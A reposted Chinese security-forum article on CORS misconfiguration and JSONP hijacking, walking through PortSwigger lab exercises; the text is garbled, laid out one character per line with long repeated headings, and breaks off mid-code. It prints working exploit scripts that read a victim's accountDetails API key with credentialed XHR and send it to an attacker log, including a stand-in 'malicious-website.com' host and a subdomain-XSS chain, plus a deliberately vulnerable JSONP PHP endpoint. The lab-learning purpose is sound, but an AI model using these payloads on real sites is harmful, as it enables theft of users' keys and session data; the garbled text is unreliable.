论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[6899] 2020-08-30_跨域漏洞那些事儿(cors、jsonp)
文档创建者:
s7ckTeam
浏览次数:
4
最后更新:
2025-01-17
漏洞
4 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2020-08-30_跨域漏洞那些事儿(cors、jsonp)
跨
域
漏
洞
那
些
事
儿
(
c
o
r
s
、
j
s
o
n
p
)
E
安
全
2
0
2
0
-
0
8
-
3
0
以
下
文
章
来
源
于
雷
神
众
测
,
作
者
h
1
1
b
a
1
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
声
明
由
于
传
播
、
利
用
此
文
所
提
供
的
信
息
而
造
成
的
任
何
直
接
或
者
间
接
的
后
果
及
损
失
,
均
由
使
用
者
本
人
负
责
,
雷
神
众
测
以
及
文
章
作
者
不
为
此
承
担
任
何
责
任
。
雷
神
众
测
拥
有
对
此
文
章
的
修
改
和
解
释
权
。
如
欲
转
载
或
传
播
此
文
章
,
必
须
保
证
此
文
章
的
完
整
性
,
包
括
版
权
声
明
等
全
部
内
容
。
未
经
雷
神
众
测
允
许
,
不
得
任
意
修
改
或
者
增
减
此
文
章
内
容
,
不
得
以
任
何
方
式
将
其
用
于
商
业
目
的
。
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
前
言
近
期
在
s
r
c
挖
掘
中
经
常
看
到
大
佬
们
提
到
c
o
r
s
,
j
o
s
n
p
一
直
不
太
理
解
此
类
漏
洞
。
特
此
学
习
记
录
一
下
,
如
有
错
误
之
处
还
望
师
傅
们
斧
正
。
N
o
.
1
N
o
.
1
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
(
跨
域
资
源
共
享
(
c
o
r
s
)
跨
域
资
源
共
享
跨
域
资
源
共
享
(
c
o
r
s
)
原
理
:
原
理
:
在
讲
c
o
r
s
之
前
我
们
先
来
了
解
一
下
同
源
策
略
(
s
o
p
)
。
1
.
1
同
源
策
略
同
源
策
略
浏
览
器
的
安
全
基
石
是
同
源
策
略
。
同
源
策
略
保
证
了
同
一
个
浏
览
器
打
开
不
同
网
站
,
不
同
网
站
之
间
不
会
相
互
影
响
。
浏
览
器
的
安
全
基
石
是
同
源
策
略
。
同
源
策
略
保
证
了
同
一
个
浏
览
器
打
开
不
同
网
站
,
不
同
网
站
之
间
不
会
相
互
影
响
。
列
如
:
张
三
登
陆
了
某
银
行
网
站
,
浏
览
器
存
储
了
他
的
c
o
o
k
i
e
。
而
这
时
他
又
打
开
了
另
一
个
小
网
站
,
该
小
网
站
会
记
录
用
户
的
c
o
o
k
i
e
。
如
果
没
有
同
源
策
略
,
他
就
会
记
录
浏
览
器
存
储
的
c
o
o
k
i
e
,
此
时
银
行
网
站
的
c
o
o
k
i
e
也
被
记
录
,
从
而
造
成
银
行
用
户
c
o
o
k
i
e
泄
露
。
同
源
策
略
中
的
同
源
是
指
:
三
个
同
源
:
同
协
议
同
协
议
,
同
域
名
同
域
名
,
同
端
口
同
端
口
,
例
如
:
h
t
t
p
s
:
/
/
w
w
w
.
t
e
s
t
.
c
o
m
和
h
t
t
p
:
/
/
w
w
w
.
t
e
s
t
.
c
o
m
(
不
同
源
,
协
议
不
同
)
h
t
t
p
:
/
/
w
w
w
.
t
e
s
t
.
c
o
m
和
h
t
t
p
:
/
/
l
o
g
i
n
.
t
e
s
t
.
c
o
m
(
不
同
源
,
域
名
不
同
)
h
t
t
p
:
/
/
w
w
w
.
t
e
s
t
.
c
o
m
:
8
0
和
h
t
t
p
:
/
/
w
w
w
.
t
e
s
t
.
c
o
m
:
8
0
8
0
(
不
同
源
,
端
口
不
同
)
1
.
2
同
源
策
略
同
源
策
略
(
s
o
p
)
的
窗
口
跨
域
资
源
共
享
的
窗
口
跨
域
资
源
共
享
(
c
o
r
s
)
但
是
安
全
和
方
便
总
是
难
两
全
。
张
三
新
开
发
了
一
个
网
站
A
,
要
从
网
站
B
上
获
取
数
据
,
但
是
因
为
同
源
策
略
的
存
在
他
获
取
不
了
B
网
站
上
的
数
据
。
此
时
他
通
过
搜
索
发
现
一
个
叫
做
跨
域
资
源
共
享
的
东
西
经
过
一
通
配
置
,
他
成
功
获
取
到
了
B
网
站
的
数
据
:
他
的
配
置
如
下
:
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
O
r
i
g
i
n
:
*
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
C
r
e
d
e
n
t
i
a
l
s
:
t
r
u
e
这
个
配
置
在
满
足
要
求
的
同
时
也
造
成
了
严
重
的
安
全
问
题
,
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
O
r
i
g
i
n
:
*
通
配
符
*
允
许
A
网
站
访
问
的
同
时
也
允
许
了
其
他
任
意
网
站
的
访
问
。
假
设
一
个
攻
击
过
程
:
网
站
C
的
c
o
r
s
配
置
存
在
缺
陷
,
被
一
个
黑
客
发
现
,
该
黑
客
通
过
友
链
申
请
,
给
站
长
发
送
了
一
个
网
站
链
接
,
站
长
为
了
确
认
友
链
网
站
,
打
开
了
网
站
链
接
,
而
该
网
站
中
部
署
了
黑
客
精
心
构
造
的
恶
意
脚
本
,
能
够
自
动
获
取
存
储
网
站
C
中
的
c
o
o
k
i
e
信
息
,
此
时
黑
客
就
获
取
到
了
站
长
的
c
o
o
k
i
e
信
息
.
.
.
配
置
讲
解
:
配
置
讲
解
:
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
O
r
i
g
i
n
:
:
*
w
e
b
浏
览
器
将
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
O
r
i
g
i
n
与
请
求
网
站
的
来
源
进
行
比
较
,
如
果
匹
配
则
允
许
访
问
响
应
例
如
:
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
O
r
i
g
i
n
:
h
t
t
p
:
/
/
w
w
w
.
t
e
s
t
.
c
o
m
此
时
网
站
l
o
g
i
n
.
t
e
s
t
.
c
o
m
(
小
A
)
向
w
w
w
.
t
e
s
t
.
c
o
m
(
小
B
)
发
起
请
求
,
小
B
一
看
请
求
源
(
o
r
i
g
i
n
)
和
自
己
的
配
置
不
一
样
,
知
道
小
A
可
能
是
个
坏
蛋
,
照
例
将
请
求
返
回
给
小
A
,
但
是
响
应
中
不
含
有
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
O
r
i
g
i
n
标
头
,
万
能
的
浏
览
器
一
看
跨
域
请
求
,
响
应
中
还
没
有
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
O
r
i
g
i
n
字
段
,
立
马
报
错
。
坏
蛋
小
A
就
获
取
不
到
小
B
的
数
据
了
.
.
.
更
多
详
细
讲
解
可
参
考
阮
老
师
文
章
:
h
t
t
p
s
:
/
/
w
w
w
.
r
u
a
n
y
i
f
e
n
g
.
c
o
m
/
b
l
o
g
/
2
0
1
6
/
0
4
/
c
o
r
s
.
h
t
m
l
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
C
r
e
d
e
n
t
i
a
l
s
:
t
r
u
e
该
字
段
可
选
。
它
的
值
是
一
个
布
尔
值
,
表
示
是
否
允
许
发
送
C
o
o
k
i
e
。
默
认
情
况
下
,
C
o
o
k
i
e
不
包
括
在
C
O
R
S
请
求
之
中
。
雷
神
众
测
雷
神
众
测
.
雷
神
众
测
,
专
注
于
渗
透
测
试
技
术
及
全
球
最
新
网
络
攻
击
技
术
的
分
析
。
设
为
t
r
u
e
,
即
表
示
服
务
器
明
确
许
可
,
C
o
o
k
i
e
可
以
包
含
在
请
求
中
,
一
起
发
给
服
务
器
。
这
个
值
也
只
能
设
为
t
r
u
e
,
如
果
服
务
器
不
要
浏
览
器
发
送
C
o
o
k
i
e
,
删
除
该
字
段
即
可
。
通
过
前
面
的
介
绍
我
们
对
通
过
前
面
的
介
绍
我
们
对
c
o
r
s
也
知
名
知
意
了
,
这
时
问
题
就
出
现
了
,
这
漏
洞
该
怎
么
挖
呢
?
也
知
名
知
意
了
,
这
时
问
题
就
出
现
了
,
这
漏
洞
该
怎
么
挖
呢
?
这
时
就
要
了
解
一
下
b
u
r
p
s
u
i
t
e
网
站
的
实
验
室
,
该
实
验
室
中
存
在
多
中
漏
洞
实
验
,
在
学
习
漏
洞
知
识
的
同
时
也
能
实
战
学
习
漏
洞
利
用
技
巧
,
接
下
来
就
简
单
记
录
一
下
实
验
过
程
。
实
验
链
接
:
h
t
t
p
s
:
/
/
p
o
r
t
s
w
i
g
g
e
r
.
n
e
t
/
w
e
b
-
s
e
c
u
r
i
t
y
/
c
o
r
s
实
战
练
习
:
实
战
练
习
:
1
.
1
来
源
(
来
源
(
o
r
i
g
i
n
)
可
任
意
更
改
的
可
任
意
更
改
的
c
o
r
s
漏
洞
漏
洞
该
实
验
个
人
账
户
界
面
存
在
账
户
的
a
p
i
密
钥
,
我
们
的
目
标
就
是
获
取
到
用
户
的
a
p
i
密
钥
通
过
观
察
网
站
源
码
,
发
现
a
p
i
密
码
是
通
过
一
个
a
j
a
x
接
口
返
回
到
页
面
的
。
直
接
访
问
接
口
,
并
将
请
求
来
源
跟
改
为
任
意
网
站
可
以
获
取
到
密
钥
,
说
明
存
在
直
接
访
问
接
口
,
并
将
请
求
来
源
跟
改
为
任
意
网
站
可
以
获
取
到
密
钥
,
说
明
存
在
c
o
r
s
漏
洞
漏
洞
此
时
我
们
有
一
个
攻
击
思
路
:
部
署
一
个
恶
意
脚
本
到
我
们
的
网
站
上
,
并
将
该
网
址
链
接
发
送
给
要
攻
击
的
小
王
,
小
王
只
要
访
问
了
我
们
的
链
接
,
我
们
即
可
获
取
到
小
王
的
a
p
i
密
钥
恶
意
脚
本
:
<
s
c
r
i
p
t
>
v
a
r
r
e
q
=
n
e
w
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
r
e
q
.
o
n
l
o
a
d
=
r
e
q
L
i
s
t
e
n
e
r
;
/
/
打
开
a
p
i
密
钥
链
接
r
e
q
.
o
p
e
n
(
'
g
e
t
'
,
'
h
t
t
p
s
:
/
/
a
c
0
c
1
f
2
b
1
e
f
c
3
2
1
1
8
0
e
1
a
1
8
c
0
0
7
1
0
0
d
3
.
w
e
b
-
s
e
c
u
r
i
t
y
-
a
c
a
d
e
m
y
.
n
e
t
/
a
c
c
o
u
n
t
D
e
t
a
i
l
s
'
,
t
r
u
e
)
;
/
/
设
置
为
t
r
u
e
可
以
保
证
,
请
求
的
时
候
携
带
c
o
o
k
i
e
r
e
q
.
w
i
t
h
C
r
e
d
e
n
t
i
a
l
s
=
t
r
u
e
;
r
e
q
.
s
e
n
d
(
)
;
/
/
将
访
问
a
p
i
密
钥
得
到
的
数
据
,
拼
接
到
u
r
l
中
访
问
自
己
服
务
,
即
可
在
服
务
器
w
e
b
日
志
中
找
到
a
p
i
密
钥
信
息
f
u
n
c
t
i
o
n
r
e
q
L
i
s
t
e
n
e
r
(
)
{
l
o
c
a
t
i
o
n
=
'
/
l
o
g
?
k
e
y
=
'
+
t
h
i
s
.
r
e
s
p
o
n
s
e
T
e
x
t
;
}
;
<
/
s
c
r
i
p
t
>
获
取
到
的
密
钥
:
1
.
2
来
源
(
来
源
(
o
r
i
g
i
n
)
可
为
可
为
n
u
l
l
的
的
c
o
r
s
漏
洞
漏
洞
在
某
些
应
用
程
序
中
可
能
会
将
n
u
l
l
列
入
白
名
单
,
以
支
持
本
地
应
用
程
序
的
开
发
。
o
r
i
g
i
n
标
头
不
可
以
设
置
为
任
意
标
头
了
,
尝
试
设
置
为
n
u
l
l
,
此
时
可
以
获
取
到
数
据
,
说
明
存
在
请
求
来
源
可
为
n
u
l
l
的
c
o
r
s
漏
洞
本
地
h
t
m
l
测
试
:
测
试
e
x
p
:
<
i
f
r
a
m
e
s
a
n
d
b
o
x
=
"
a
l
l
o
w
-
s
c
r
i
p
t
s
a
l
l
o
w
-
t
o
p
-
n
a
v
i
g
a
t
i
o
n
a
l
l
o
w
-
f
o
r
m
s
"
s
r
c
=
"
d
a
t
a
:
t
e
x
t
/
h
t
m
l
,
<
s
c
r
i
p
t
>
v
a
r
r
e
q
=
n
e
w
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
r
e
q
.
o
n
l
o
a
d
=
r
e
q
L
i
s
t
e
n
e
r
;
r
e
q
.
o
p
e
n
(
'
g
e
t
'
,
'
h
t
t
p
s
:
/
/
a
c
8
d
1
f
4
c
1
e
b
c
2
a
f
2
8
0
6
b
9
d
9
d
0
0
d
f
0
0
4
1
.
w
e
b
-
s
e
c
u
r
i
t
y
-
a
c
a
d
e
m
y
.
n
e
t
/
a
c
c
o
u
n
t
D
e
t
a
i
l
s
'
,
t
r
u
e
)
;
r
e
q
.
w
i
t
h
C
r
e
d
e
n
t
i
a
l
s
=
t
r
u
e
;
r
e
q
.
s
e
n
d
(
)
;
c
o
n
s
o
l
e
.
l
o
g
(
t
h
i
s
.
r
e
s
p
o
n
s
e
T
e
x
t
)
;
<
/
s
c
r
i
p
t
>
"
>
<
/
i
f
r
a
m
e
>
此
时
我
们
继
续
采
用
实
验
一
的
攻
击
思
路
:
部
署
一
个
恶
意
脚
本
到
我
们
的
网
站
上
,
并
将
该
网
址
链
接
发
送
给
要
攻
击
的
小
王
,
小
王
只
要
访
问
了
我
们
的
链
接
,
我
们
即
可
获
取
到
小
王
的
a
p
i
密
钥
编
写
e
x
p
:
<
i
f
r
a
m
e
s
a
n
d
b
o
x
=
"
a
l
l
o
w
-
s
c
r
i
p
t
s
a
l
l
o
w
-
t
o
p
-
n
a
v
i
g
a
t
i
o
n
a
l
l
o
w
-
f
o
r
m
s
"
s
r
c
=
"
d
a
t
a
:
t
e
x
t
/
h
t
m
l
,
<
s
c
r
i
p
t
>
v
a
r
r
e
q
=
n
e
w
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
r
e
q
.
o
n
l
o
a
d
=
r
e
q
L
i
s
t
e
n
e
r
;
r
e
q
.
o
p
e
n
(
'
g
e
t
'
,
'
h
t
t
p
s
:
/
/
a
c
8
d
1
f
4
c
1
e
b
c
2
a
f
2
8
0
6
b
9
d
9
d
0
0
d
f
0
0
4
1
.
w
e
b
-
s
e
c
u
r
i
t
y
-
a
c
a
d
e
m
y
.
n
e
t
/
a
c
c
o
u
n
t
D
e
t
a
i
l
s
'
,
t
r
u
e
)
;
r
e
q
.
w
i
t
h
C
r
e
d
e
n
t
i
a
l
s
=
t
r
u
e
;
r
e
q
.
s
e
n
d
(
)
;
f
u
n
c
t
i
o
n
r
e
q
L
i
s
t
e
n
e
r
(
)
{
/
/
恶
意
网
站
l
o
c
a
t
i
o
n
=
'
m
a
l
i
c
i
o
u
s
-
w
e
b
s
i
t
e
.
c
o
m
/
l
o
g
?
k
e
y
=
'
+
t
h
i
s
.
r
e
s
p
o
n
s
e
T
e
x
t
;
}
;
<
/
s
c
r
i
p
t
>
"
>
<
/
i
f
r
a
m
e
>
1
.
3
利
用
信
任
子
域
的
利
用
信
任
子
域
的
x
s
s
获
取
主
域
的
敏
感
信
息
获
取
主
域
的
敏
感
信
息
有
些
服
务
器
的
配
置
为
:
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
O
r
i
g
i
n
:
h
t
t
p
:
/
/
*
.
t
e
s
t
.
c
o
m
这
个
配
置
乍
一
看
没
问
题
,
信
任
自
己
的
子
域
不
是
很
正
常
吗
,
但
是
子
域
成
百
上
千
的
大
网
站
中
,
子
域
就
特
别
容
易
出
问
题
,
找
个
x
s
s
既
有
可
能
严
重
威
胁
到
主
站
。
而
且
该
配
置
也
不
符
合
最
小
信
任
原
则
,
通
配
符
不
能
随
便
用
,
应
该
设
置
为
固
定
值
。
例
如
:
A
c
c
e
s
s
-
C
o
n
t
r
o
l
-
A
l
l
o
w
-
O
r
i
g
i
n
:
h
t
t
p
:
/
/
l
o
g
i
n
.
t
e
s
t
.
c
o
m
此
时
只
要
保
证
l
o
g
i
n
.
t
e
s
t
.
c
o
m
没
问
题
即
可
确
保
主
站
不
会
遭
受
c
o
r
s
攻
击
在
该
实
验
三
中
将
来
源
(
o
r
i
g
i
n
)
设
置
为
任
意
子
域
,
如
:
设
置
为
不
存
在
的
e
x
a
m
p
l
e
子
域
,
依
旧
可
以
访
问
敏
感
数
据
正
好
该
网
站
的
检
查
库
存
会
将
单
价
信
息
返
回
到
子
域
,
并
且
p
r
o
d
u
c
t
I
d
参
数
存
在
x
s
s
漏
洞
所
以
想
到
一
个
利
用
链
:
子
域
触
发
x
s
s
-
-
-
>
访
问
主
域
敏
感
信
息
-
-
-
>
将
敏
感
信
息
保
存
到
任
意
网
站
e
x
p
:
<
s
c
r
i
p
t
>
d
o
c
u
m
e
n
t
.
l
o
c
a
t
i
o
n
=
"
h
t
t
p
:
/
/
s
t
o
c
k
.
a
c
6
7
1
f
9
6
1
e
9
e
1
2
7
a
8
0
5
2
d
5
2
0
0
0
5
1
0
0
6
e
.
w
e
b
-
s
e
c
u
r
i
t
y
-
a
c
a
d
e
m
y
.
n
e
t
/
?
p
r
o
d
u
c
t
I
d
=
4
<
s
c
r
i
p
t
>
v
a
r
r
e
q
=
n
e
w
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
r
e
q
.
o
n
l
o
a
d
=
r
e
q
L
i
s
t
e
n
e
r
;
r
e
q
.
o
p
e
n
(
'
g
e
t
'
,
'
h
t
t
p
s
:
/
/
a
c
6
7
1
f
9
6
1
e
9
e
1
2
7
a
8
0
5
2
d
5
2
0
0
0
5
1
0
0
6
e
.
w
e
b
-
s
e
c
u
r
i
t
y
-
a
c
a
d
e
m
y
.
n
e
t
/
a
c
c
o
u
n
t
D
e
t
a
i
l
s
'
,
t
r
u
e
)
;
r
e
q
.
w
i
t
h
C
r
e
d
e
n
t
i
a
l
s
=
t
r
u
e
;
r
e
q
.
s
e
n
d
(
)
;
f
u
n
c
t
i
o
n
r
e
q
L
i
s
t
e
n
e
r
(
)
{
l
o
c
a
t
i
o
n
=
'
h
t
t
p
s
:
/
/
a
c
0
2
1
f
f
5
1
e
5
3
1
2
1
f
8
0
4
e
d
5
d
3
0
1
3
3
0
0
d
a
.
w
e
b
-
s
e
c
u
r
i
t
y
-
a
c
a
d
e
m
y
.
n
e
t
/
l
o
g
?
k
e
y
=
'
%
2
b
t
h
i
s
.
r
e
s
p
o
n
s
e
T
e
x
t
;
}
;
%
3
c
/
s
c
r
i
p
t
>
&
s
t
o
r
e
I
d
=
1
"
<
/
s
c
r
i
p
t
>
e
x
p
解
释
:
<
s
c
r
i
p
t
>
/
/
子
域
触
发
x
s
s
,
x
s
s
访
问
主
域
敏
感
信
息
d
o
c
u
m
e
n
t
.
l
o
c
a
t
i
o
n
=
"
h
t
t
p
:
/
/
s
t
o
c
k
.
a
c
6
7
1
f
9
6
1
e
9
e
1
2
7
a
8
0
5
2
d
5
2
0
0
0
5
1
0
0
6
e
.
w
e
b
-
s
e
c
u
r
i
t
y
-
a
c
a
d
e
m
y
.
n
e
t
/
?
p
r
o
d
u
c
t
I
d
=
4
/
/
采
用
原
生
j
s
h
t
t
p
请
求
将
获
取
到
的
内
容
,
保
存
到
主
机
<
s
c
r
i
p
t
>
v
a
r
r
e
q
=
n
e
w
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
r
e
q
.
o
n
l
o
a
d
=
r
e
q
L
i
s
t
e
n
e
r
;
/
/
访
问
敏
感
信
息
r
e
q
.
o
p
e
n
(
'
g
e
t
'
,
'
h
t
t
p
s
:
/
/
a
c
6
7
1
f
9
6
1
e
9
e
1
2
7
a
8
0
5
2
d
5
2
0
0
0
5
1
0
0
6
e
.
w
e
b
-
s
e
c
u
r
i
t
y
-
a
c
a
d
e
m
y
.
n
e
t
/
a
c
c
o
u
n
t
D
e
t
a
i
l
s
'
,
t
r
u
e
)
;
r
e
q
.
w
i
t
h
C
r
e
d
e
n
t
i
a
l
s
=
t
r
u
e
;
r
e
q
.
s
e
n
d
(
)
;
f
u
n
c
t
i
o
n
r
e
q
L
i
s
t
e
n
e
r
(
)
{
/
/
携
带
敏
感
信
息
,
g
e
t
请
求
访
问
主
机
,
主
机
l
o
g
日
志
即
可
出
现
用
户
a
p
i
k
e
y
l
o
c
a
t
i
o
n
=
'
h
t
t
p
s
:
/
/
a
c
0
2
1
f
f
5
1
e
5
3
1
2
1
f
8
0
4
e
d
5
d
3
0
1
3
3
0
0
d
a
.
w
e
b
-
s
e
c
u
r
i
t
y
-
a
c
a
d
e
m
y
.
n
e
t
/
l
o
g
?
k
e
y
=
'
%
2
b
t
h
i
s
.
r
e
s
p
o
n
s
e
T
e
x
t
;
}
;
%
3
c
/
s
c
r
i
p
t
>
&
s
t
o
r
e
I
d
=
1
"
<
/
s
c
r
i
p
t
>
跨
域
除
了
跨
域
除
了
c
o
r
s
外
还
有
一
种
非
官
方
的
方
法
外
还
有
一
种
非
官
方
的
方
法
j
s
o
n
p
,
,
j
s
o
n
p
是
是
J
S
O
N
w
i
t
h
p
a
d
d
i
n
g
(
填
充
式
(
填
充
式
J
S
O
N
或
参
数
式
或
参
数
式
J
S
O
N
)
的
简
写
。
)
的
简
写
。
j
s
o
n
p
通
过
动
态
创
建
<
s
c
r
i
p
t
>
标
签
,
然
后
利
用
<
s
c
r
i
p
t
>
的
s
r
c
属
性
不
受
同
源
策
略
的
约
束
来
获
取
跨
域
数
据
。
j
s
o
n
p
在
造
成
方
便
的
同
时
也
造
成
了
一
定
的
安
全
的
问
题
。
j
s
o
n
p
劫
持
最
早
在
0
8
年
提
出
,
早
期
各
大
厂
商
并
不
重
视
此
类
漏
洞
,
但
在
个
人
信
息
保
护
严
密
的
现
在
,
j
s
o
n
p
劫
持
带
来
的
信
息
泄
露
问
题
,
促
使
各
大
s
r
c
厂
商
开
始
重
视
j
s
o
n
p
劫
持
漏
洞
。
以
下
简
要
分
析
j
s
o
n
p
劫
持
原
理
,
很
多
不
足
之
处
,
还
望
大
佬
们
斧
正
。
N
o
.
2
N
o
.
2
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
j
s
o
n
p
劫
持
劫
持
2
.
1
漏
洞
场
景
模
拟
:
漏
洞
场
景
模
拟
:
某
司
因
为
业
务
需
求
,
需
要
网
站
B
从
网
站
A
中
获
取
j
s
o
n
数
据
,
所
以
他
们
在
A
中
实
现
了
一
个
j
s
o
n
p
接
口
接
口
代
码
如
下
:
<
?
p
h
p
h
e
a
d
e
r
(
'
C
o
n
t
e
n
t
-
t
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
'
)
;
/
/
获
取
回
调
函
数
名
$
j
s
o
n
p
C
a
l
l
b
a
c
k
=
h
t
m
l
s
p
e
c
i
a
l
c
h
a
r
s
(
$
_
R
E
Q
U
E
S
T
[
'
j
s
o
n
p
'
]
)
;
/
/
j
s
o
n
数
据
$
j
s
o
n
_
d
a
t
a
=
'
[
"
张
三
"
,
"
1
2
0
1
1
0
1
2
1
1
0
"
,
"
男
"
,
"
浙
江
杭
州
"
]
'
;
/
/
输
出
j
s
o
n
p
格
式
的
数
据
e
c
h
o
$
j
s
o
n
p
C
a
l
l
b
a
c
k
.
"
(
"
.
$
j
s
o
n
_
d
a
t
a
.
"
)
"
;
?
>
网
站
B
代
码
如
下
:
<
!
D
O
C
T
Y
P
E
h
t
m
l
>
<
h
t
m
l
>
<
h
e
a
d
>
<
m
e
t
a
c
h
a
r
s
e
t
=
"
u
t
f
-
8
"
>
<
t
i
t
l
e
>
J
S
O
N
P
实
例
<
/
t
i
t
l
e
>
<
/
h
e
a
d
>
<
b
o
d
y
>
<
d
i
v
i
d
=
"
d
i
v
C
u
s
t
o
m
e
r
s
"
>
<
/
d
i
v
>
<
s
c
r
i
p
t
t
y
p
e
=
"
t
e
x
t
/
j
a
v
a
s
c
r
i
p
t
"
>
f
u
n
c
t
i
o
n
c
a
l
l
b
a
c
k
(
r
e
s
u
l
t
,
m
e
t
h
o
d
N
a
m
e
)
{
v
a
r
h
t
m
l
=
'
<
u
l
>
'
;
f
o
r
(
v
a
r
i
=
0
;
i
<
r
e
s
u
l
t
.
l
e
n
g
t
h
;
i
+
+
)
{
h
t
m
l
+
=
'
<
l
i
>
'
+
r
e
s
u
l
t
[
i
]
+
'
<
/
l
i
>
'
;
}
h
t
m
l
+
=
'
<
/
u
l
>
'
;
d
o
c
u
m
e
n
t
.
g
e
t
E
l
e
m
e
n
t
B
y
I
d
(
'
d
i
v
C
u
s
t
o
m
e
r
s
'
)
.
i
n
n
e
r
H
T
M
L
=
h
t
m
l
;
}
<
/
s
c
r
i
p
t
>
<
s
